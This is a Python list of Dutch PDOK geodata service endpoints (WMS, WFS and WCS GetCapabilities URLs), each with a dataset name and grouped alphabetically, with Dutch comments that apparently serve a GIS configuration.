# en 2016_ortho25 en 2016_ortho25IR er uit
# 7570 lagen
# 8645 lagen!!
#
# WMS en WFS:
# Administratieve Eenheden (INSPIRE geharmoniseerd)
# BAG Terugmeldingen
# CBS Wijken en Buurten 2017
# Geluidskaarten Schiphol
# Geluidskaarten spoorwegen
# Geografische Namen (INSPIRE geharmoniseerd)
# Geomorfologischekaart 1:50.000
# Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd)
# Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd)
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/a
('wms', 'AHN1 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wms?service=wms&request=getcapabilities'),
('wfs', 'AHN1 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wfs?version=1.0.0&request=GetCapabilities'),
('wcs', 'AHN1 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn1/wcs?request=getcapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'AHN2 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wms?service=wms&request=getcapabilities'),
('wfs', 'AHN2 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wfs?version=1.0.0&request=GetCapabilities'),
('wcs', 'AHN2 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn2/wcs?request=getcapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'AHN3 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wms?request=GetCapabilities'),
('wfs', 'AHN3 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wfs?request=GetCapabilities'),
('wcs', 'AHN3 (WCS | Open)', 'https://geodata.nationaalgeoregister.nl/ahn3/wcs?request=GetCapabilities&SERVICE=WCS&VERSION=1.1.1'),
('wms', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WMS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wms?&request=GetCapabilities&service=WMS'),
('wfs', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WFS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wfs?&request=GetCapabilities&service=WFS'),
('wms', 'Adressen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspireadressen/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Adressen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspireadressen/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Adressen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/ad/wms?request=GetCapabilities'),
('wfs', 'Adressen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/ad/wfs?request=GetCapabilities'),
('wms', 'AAN (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/aan/wms?request=GetCapabilities'),
('wfs', 'AAN (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/aan/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Asbest scholenkaart (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/asbestscholenkaart/wms?request=GetCapabilities '),
('wfs', 'Asbest scholenkaart (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/asbestscholenkaart/wfs?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/b
('wfs', 'BAG (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bag/wfs?request=GetCapabilities'),
('wms', 'BAG (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bag/wms?request=GetCapabilities'),
('wms', 'BAG Terugmeldingen (WMS | Open)','https://geodata.nationaalgeoregister.nl/bagterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BAG Terugmeldingen (WFS | Open)','https://geodata.nationaalgeoregister.nl/bagterugmeldingen/wfs?request=GetCapabilities'),
('wms', 'Basisregistratie Gewaspercelen (BRP) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/brpgewaspercelen/wms?request=GetCapabilities'),
('wfs', 'Basisregistratie Gewaspercelen (BRP) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/brpgewaspercelen/wfs?version=1.0.0&request=GetCapabilities'),
('wfs', 'Bekendmakingen (WFS | Open)', 'http://geozet.koop.overheid.nl/wfs?version=1.0.0&request=GetCapabilities'),
# BGT zijn allemaal WMTS'en...
('wms', 'Beschermde natuurmonumenten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/beschermdenatuurmonumenten/ows?service=wms&request=getcapabilities'),
('wfs', 'Beschermde natuurmonumenten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/beschermdenatuurmonumenten/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Bestuurlijke grenzen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestuurlijkegrenzen/wms?&Request=getcapabilities'),
('wfs', 'Bestuurlijke grenzen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestuurlijkegrenzen/wfs?version=1.0.0&request=GetCapabilities'),
#zit in algemene WMTS Caps ('wmts', 'BRP Gewaspercelen (WMTS | Open) ', 'http://geodata.nationaalgeoregister.nl/wmts/brtachtergrondkaart?VERSION=1.0.0&request=GetCapabilities') ,
#zit in algemene WMTS Caps ('wmts', 'BRT achtergrondkaart (WMTS | Open) ', 'http://geodata.nationaalgeoregister.nl/wmts/brtachtergrondkaart?VERSION=1.0.0&request=GetCapabilities') ,
('wms', 'BGT Terugmeldingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bgtterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BGT Terugmeldingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bgtterugmeldingen/wfs?request=GetCapabilities'),
('wms', 'Bodemkaart 1:50.000 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bodemkaart50000/wms?request=getCapabilities'),
('wfs', 'Bodemkaart 1:50.000 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bodemkaart50000/wfs?request=getCapabilities'),
('wms', 'BRT Terugmeldingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/brtterugmeldingen/wms?request=GetCapabilities'),
('wfs', 'BRT Terugmeldingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/brtterugmeldingen/wms?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/c
('wms', 'CBS Aardgas- en elektriciteitslevering (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsenergieleveringen/wms?request=GetCapabilities'),
('wfs', 'CBS Aardgas- en elektriciteitslevering (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsenergieleveringen/wfs?request=GetCapabilities'),
('wms', 'CBS Bestand Bodemgebruik 2008 (BBG 2008) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2008/wms?request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2008 (BBG 2008) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2008/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bestand Bodemgebruik 2010 (BBG 2010) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2010/wms?service=wms&request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2010 (BBG 2010) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2010/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bestand Bodemgebruik 2012 (BBG 2012) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2012/wms?service=wms&request=getcapabilities') ,
('wfs', 'CBS Bestand Bodemgebruik 2012 (BBG 2012) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/bestandbodemgebruik2012/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bevolkingskernen 2008 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2008/wms?request=getcapabilities') ,
('wfs', 'CBS Bevolkingskernen 2008 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2008/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Bevolkingskernen 2011 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2011/wms?request=getcapabilities') ,
('wfs', 'CBS Bevolkingskernen 2011 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/bevolkingskernen2011/wfs?version=1.0.0&request=GetCapabilities') ,
('wms', 'CBS Gebiedsindelingen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsgebiedsindelingen/wms?request=GetCapabilities'),
('wfs', 'CBS Gebiedsindelingen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cbsgebiedsindelingen/wfs?request=GetCapabilities'),
('wms', 'CBS Gebiedsindelingen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/su-vector/wms?&request=GetCapabilities'),
('wfs', 'CBS Gebiedsindelingen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/su-vector/wfs?&request=GetCapabilities'),
('wms', 'CBS Provincies (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/cbsprovincies/wms?request=GetCapabilities') ,
('wfs', 'CBS Provincies (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/cbsprovincies/wfs?request=GetCapabilities') ,
('wms', 'CBS Vierkantstatistieken 100m (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten100mv2/wms?request=GetCapabilities') ,
('wfs', 'CBS Vierkantstatistieken 100m (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten100mv2/wfs?request=GetCapabilities') ,
('wms', 'CBS Vierkantstatistieken 500m (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten500mv2/wms?request=GetCapabilities') ,
('wfs', 'CBS Vierkantstatistieken 500m (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/cbsvierkanten500mv2/wfs?request=GetCapabilities') ,
('wms', 'CBS Wijken en Buurten 2009 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2009/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2009 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2009/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2010 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2010/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2010 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2010/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2011 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2011/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2011 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2011/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2012 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2012/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2012 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2012/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2013 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2013/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2013 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2013/wfs?version=1.0.0&request=getcapabilities') ,
('wms', 'CBS Wijken en Buurten 2014 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2014/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2014 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2014/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2015 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2015/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2015 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2015/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2016 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2016/wms?request=getcapabilities') ,
('wfs', 'CBS Wijken en Buurten 2016 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2016/wfs?version=1.0.0&request=getcapabilities'),
('wms', 'CBS Wijken en Buurten 2017 (WMS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2017/wms?request=GetCapabilities') ,
('wfs', 'CBS Wijken en Buurten 2017 (WFS | Open) ', 'https://geodata.nationaalgeoregister.nl/wijkenbuurten2017/wfs?request=GetCapabilities'),
('wms', 'Cultuurhistorisch GIS (CultGIS) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/cultgis/wms?SERVICE=WMS&request=GetCapabilities') ,
('wfs', 'Cultuurhistorisch GIS (CultGIS) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/cultgis/wfs?version=1.0.0&request=GetCapabilities') ,
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/d
('wms', 'Digitaal Topografisch Bestand (DTB) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/digitaaltopografischbestand/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Digitaal Topografisch Bestand (DTB) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/digitaaltopografischbestand/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Drone no-fly zone (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/dronenoflyzones/wms?request=GetCapabilities'),
('wfs', 'Drone no-fly zone (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/dronenoflyzones/wfs?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/e
('wms', 'Ecotopen (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/ecotopen/wms?request=GetCapabilities') ,
('wfs', 'Ecotopen (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/ecotopen/wfs?request=GetCapabilities') ,
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/f
('wms', 'Fietsknooppunten (WMS | Open)','https://geodata.nationaalgeoregister.nl/fietsknooppuntennetwerk/wms?request=GetCapabilities'),
('wms', 'Fysisch Geografische Regio’s (WMS | Open)','https://geodata.nationaalgeoregister.nl/fysischgeografischeregios/wms?request=GetCapabilities'),
('wfs', 'Fysisch Geografische Regio’s (WFS | Open)','https://geodata.nationaalgeoregister.nl/fysischgeografischeregios/wfs?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/g
('wms' , 'Gebouwen (INSPIRE geharmoniseerd) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/bu/wms?request=GetCapabilities') ,
('wfs' , 'Gebouwen (INSPIRE geharmoniseerd) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/bu/wfs?request=GetCapabilities') ,
('wms' , 'Geluidskaarten Rijkswegen (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/rwsgeluidskaarten/wms?request=GetCapabilities') ,
('wfs' , 'Geluidskaarten Rijkswegen (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/rwsgeluidskaarten/wfs?request=GetCapabilities') ,
('wms', 'Geluidskaarten Schiphol WMS (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenschiphol/wms?request=GetCapabilities') ,
('wfs', 'Geluidskaarten Schiphol WFS (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenschiphol/wfs?request=GetCapabilities'),
('wms', 'Geluidskaarten spoorwegen WMS (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenspoorwegen/wms?request=GetCapabilities') ,
('wfs', 'Geluidskaarten spoorwegen WFS (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/geluidskaartenspoorwegen/wfs?request=GetCapabilities'),
('wms', 'Geografische Namen (INSPIRE geharmoniseerd) (WMS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/gn/wms?&request=GetCapabilities'),
('wfs', 'Geografische Namen (INSPIRE geharmoniseerd) (WFS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/gn/wfs?&request=GetCapabilities'),
('wms', 'Geomorfologischekaart 1:50.000 (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/geomorfologischekaart50000/wms?request=GetCapabilities'),
('wfs', 'Geomorfologischekaart 1:50.000 (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/geomorfologischekaart50000/wfs?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/h
('wms', 'Habitatrichtlijn verspreiding van habitattypen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wms?request=getcapabilities'),
('wfs', 'Habitatrichtlijn verspreiding van habitattypen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wfs?request=getcapabilities'),
('wms', 'Habitatrichtlijn verspreiding van soorten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidingsoorten/wms?request=GetCapabilities'),
('wfs', 'Habitatrichtlijn verspreiding van soorten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidingsoorten/wfs?request=GetCapabilities'),
('wms', 'Historische Rivierkaarten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/historischerivierkaarten/wms?request=GetCapabilities'),
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/i
('wms', 'Indicatieve aandachtsgebieden funderingsproblematiek (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/indgebfunderingsproblematiek/wms?&request=GetCapabilities') ,
('wfs', 'Indicatieve aandachtsgebieden funderingsproblematiek (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/indgebfunderingsproblematiek/wfs?&request=GetCapabilities') ,
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/k
('wms' , 'Kadastrale Kaart v3 (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/kadastralekaartv3/wms?request=GetCapabilities') ,
('wfs' , 'Kadastrale Kaart v3 (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/kadastralekaartv3/wfs?request=GetCapabilities'),
('wms' , 'Kadastrale Percelen (INSPIRE geharmoniseerd) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/cp/wms?request=GetCapabilities') ,
('wfs' , 'Kadastrale Percelen (INSPIRE geharmoniseerd) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/inspire/cp/wfs?request=GetCapabilities'),
('wms' , 'Kweldervegetatie (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/kweldervegetatie/wms?request=GetCapabilities') ,
('wfs' , 'Kweldervegetatie (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/kweldervegetatie/wfs?request=GetCapabilities') ,
# zit in algememe wmts caps: Kadastrale kaart (WMTS | PDOK Basis) http://geodata.nationaalgeoregister.nl/wmts/kadastralekaart?VERSION=1.0.0&request=GetCapabilities
# https//www.pdok.nl/nl/producten/pdok-services/overzicht-urls/l
('wms', 'Landelijke fietsroutes (WMS | Open) ','https://geodata.nationaalgeoregister.nl/lfroutes/wms?request=GetCapabilities'),
('wms', 'Lange afstandswandelroutes (WMS | Open) ','https://geodata.nationaalgeoregister.nl/lawroutes/wms?request=GetCapabilities'),
# luchtfoto WMTS'en zitten in aparte services !!! niet in de algemene
('wms', 'Luchtfoto Beeldmateriaal / PDOK 25 cm Infrarood (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/infrarood/wms?&request=GetCapabilities'),
('wms', 'Luchtfoto Beeldmateriaal / PDOK 25 cm RGB (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/luchtfoto/rgb/wms?&request=GetCapabilities'),
# overige luchtfoto's ("Gesloten" maar niet toegevoegd...)
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/m
('wms', 'Mossel- en oesterhabitats (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselenoesterhabitats/wms?request=GetCapabilities') ,
('wfs', 'Mossel- en oesterhabitats (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselenoesterhabitats/wfs?request=GetCapabilities') ,
('wms', 'Mosselzaad invanginstallaties (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselzaadinvanginstallaties/wms?request=GetCapabilities') ,
('wfs', 'Mosselzaad invanginstallaties (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/mosselzaadinvanginstallaties/wfs?request=GetCapabilities') ,
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/n
('wms', 'NAPinfo (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/napinfo/wms?request=GetCapabilities'),
('wfs', 'Napinfo (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/napinfo/wfs?request=GetCapabilities'),
('wms', 'Nationaal Hydrologisch Instrumentarium (NHI) (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/nhi/ows?service=wms&request=GetCapabilities'),
('wfs', 'Nationaal Hydrologisch Instrumentarium (NHI) (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/nhi/wfs?request=GetCapabilities'),
('wms', 'Nationale EnergieAtlas informatielagen Kadaster (WMS | Open)' , 'https://geodata.nationaalgeoregister.nl/neainfolagenkadaster/wms?request=GetCapabilities'),
('wfs', 'Nationale EnergieAtlas informatielagen Kadaster (WFS | Open)' , 'https://geodata.nationaalgeoregister.nl/neainfolagenkadaster/wfs?request=GetCapabilities'),
('wms', 'Nationale Parken (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nationaleparken/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Nationale Parken (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nationaleparken/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Nationale Streekpaden (WMS | Open) ','https://geodata.nationaalgeoregister.nl/streekpaden/wms?request=GetCapabilities'),
('wms', 'Natura 2000 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/natura2000/wms?&request=getcapabilities'),
('wfs', 'Natura 2000 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/natura2000/wfs?version=1.0.0&request=GetCapabilities'),
# zit in algememe wmts caps: Natura 2000 (WMTS | Open) http://geodata.nationaalgeoregister.nl/tiles/service/wmts/natura2000?VERSION=1.0.0&request=GetCapabilities
# geen TMS: Natura 2000 (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/natura2000@EPSG:28992@png8
('wms','Natuurmeting Op Kaart 2010 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2010/wms?service=wms&request=getcapabilities'),
('wfs','Natuurmeting Op Kaart 2011 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nok2011/wfs?version=1.0.0&request=GetCapabilities'),
# zit in algememe wmts caps: Natuurmeting Op Kaart 2011 (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/nok2011?VERSION=1.0.0&request=GetCapabilities
('wms', 'Natuurmeting Op Kaart 2011 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2011/wms?service=wms&request=getcapabilities'),
# geen TMS: Natuurmeting Op Kaart 2011 (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/nok2011@EPSG:28992@png8
('wms', 'Natuurmeting Op Kaart 2012 (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2012/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2012 (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nok2012/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Natuurmeting Op Kaart 2013 (WMS | Open)','https://geodata.nationaalgeoregister.nl/nok2013/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2013 (WFS | Open)','https://geodata.nationaalgeoregister.nl/nok2013/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Natuurmeting Op Kaart 2014 (WMS | Open)','https://geodata.nationaalgeoregister.nl/nok2014/wms?request=GetCapabilities'),
('wfs','Natuurmeting Op Kaart 2014 (WFS | Open)','https://geodata.nationaalgeoregister.nl/nok2014/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Noordzee Vaarwegmarkeringen (WMS | Open)','https://geodata.nationaalgeoregister.nl/noordzeevaarwegmarkeringenrd/wms?service=wms&version=1.0.0&request=getcapabilities'),
('wfs','Noordzee Vaarwegmarkeringen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/noordzeevaarwegmarkeringenrd/wfs?version=1.0.0&request=GetCapabilities'),
('wms','Nulmeting op Kaart 2007 (NOK2007) (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nok2007/wms?service=wms&request=getcapabilities'),
#('wms','Noordzee Wingebieden (WMS | Open)' , 'http://geodata.nationaalgeoregister.nl/noordzeewingebieden/wms?service=wms&version=1.0.0&request=GetCapabilities'),
#('wfs','Noordzee Wingebieden (WFS | Open) ','http://geodata.nationaalgeoregister.nl/noordzeewingebieden/wfs?version=1.0.0&request=GetCapabilities'),
# NWB Spoorwegen eruit wordt Spoorwegen prorail?
('wfs','NWB-Spoorwegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbspoorwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Spoorwegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbspoorwegen/wms?SERVICE=WMS&request=GetCapabilities'),
#
('wfs','NWB-Vaarwegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbvaarwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Vaarwegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbvaarwegen/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs','NWB-Wegen (WFS | Open) ','https://geodata.nationaalgeoregister.nl/nwbwegen/wfs?version=1.0.0&request=GetCapabilities'),
('wms','NWB-Wegen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/nwbwegen/wms?SERVICE=WMS&request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/o
('wms','Oppervlaktewaterlichamen (WMS | Open)','https://geodata.nationaalgeoregister.nl/rwsoppervlaktewaterlichamen/wms?request=GetCapabilities'),
('wfs','Oppervlaktewaterlichamen (WFS | Open)','https://geodata.nationaalgeoregister.nl/rwsoppervlaktewaterlichamen/wfs?request=GetCapabilities'),
('wms','Overheidsdiensten (WMS | Open)','https://geodata.nationaalgeoregister.nl/overheidsdiensten/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/p
('wms', 'Potentiekaart omgevingswarmte (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/omgevingswarmte/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart omgevingswarmte (WFS | Open))', 'https://geodata.nationaalgeoregister.nl/omgevingswarmte/wfs?request=GetCapabilities'),
('wms', 'Potentiekaart reststromen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/reststromen/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart reststromen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/reststromen/wfs?request=GetCapabilities'),
('wms', 'Potentiekaart restwarmte (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/restwarmte/wms?request=GetCapabilities'),
('wfs', 'Potentiekaart restwarmte (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/restwarmte/wfs?request=GetCapabilities'),
('wms', 'Publiekrechtelijke Beperking (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/publiekrechtelijkebeperking/wms?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/r
('wms', 'RDinfo (WMS | Open) ','https://geodata.nationaalgeoregister.nl/rdinfo/wms?service=wms&request=getcapabilities'),
('wfs', 'RDinfo (WFS | Open) ','https://geodata.nationaalgeoregister.nl/rdinfo/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Ruimtelijke plannen (WMS | Open) ','https://geodata.nationaalgeoregister.nl/plu/wms?service=wms&request=getcapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/s
('wms', 'Schelpdierenpercelen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierenpercelen/wms?request=GetCapabilities'),
('wfs', 'Schelpdierenpercelen (WFS | Open)','https://geodata.nationaalgeoregister.nl/schelpdierenpercelen/wfs?request=GetCapabilities'),
('wms', 'Schelpdierwater (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierwater/wms?request=getcapabilities'),
('wfs', 'Schelpdierwater (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/schelpdierwater/wfs?request=getcapabilities'),
('wms', 'Spoorwegen (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/spoorwegen/wms?request=GetCapabilities'),
('wfs', 'Spoorwegen (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/spoorwegen/wfs?version=1.0.0&request=GetCapabilities'),
